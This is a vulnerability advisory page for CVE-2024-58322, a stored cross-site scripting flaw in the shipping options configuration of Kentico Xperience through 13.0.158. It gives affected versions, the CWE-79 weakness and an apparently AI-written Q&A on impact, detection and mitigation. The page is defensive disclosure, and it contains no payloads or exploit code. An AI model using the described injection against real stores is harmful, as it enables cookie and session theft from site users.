CVE-2024-58322
BaseFortify
Publication date: 2025-12-18
Last updated on: 2025-12-27
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| kentico | xperience | to 13.0.158 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2024-58322 is a stored cross-site scripting (XSS) vulnerability in Kentico Xperience up to version 13.0.158. It occurs because the application does not properly neutralize input in the shipping options configuration, allowing attackers to inject malicious scripts. These scripts are stored and later executed in the browsers of users who access the affected shipping options, potentially compromising their security. [1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability could lead to the theft of sensitive data by executing malicious scripts in users' browsers, which may impact compliance with data protection regulations such as GDPR and HIPAA by potentially exposing personal or sensitive information. However, specific compliance implications are not detailed in the provided resources. [1]
How can this vulnerability impact me? :
This vulnerability can lead to the theft of sensitive data by executing malicious scripts in users' browsers. Attackers can exploit the stored XSS to run scripts that may steal cookies, session tokens, or other sensitive information, potentially leading to unauthorized access or data breaches. The CVSS score indicates a medium severity with low impact on confidentiality, integrity, and availability, but user interaction is required for exploitation. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this vulnerability involves checking if your Kentico Xperience installation is running a vulnerable version (up to and including 13.0.158) and inspecting the shipping options configuration for injected malicious scripts. Since this is a stored XSS vulnerability, you can look for suspicious script tags or encoded JavaScript in the shipping options configuration data. There are no specific commands provided in the resources, but you can use web application scanning tools or manual inspection of the shipping options configuration in the admin interface. Additionally, monitoring HTTP traffic for unusual script payloads targeting the shipping options pages may help detect exploitation attempts. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include applying the hotfix provided by Kentico DevNet that addresses this stored XSS vulnerability. Until the patch is applied, restrict access to the shipping options configuration to trusted users only, and educate users to avoid interacting with suspicious links or inputs. Additionally, implement input validation and output encoding where possible to reduce the risk of script injection. Monitoring and logging access to the affected configuration can also help detect exploitation attempts. [1]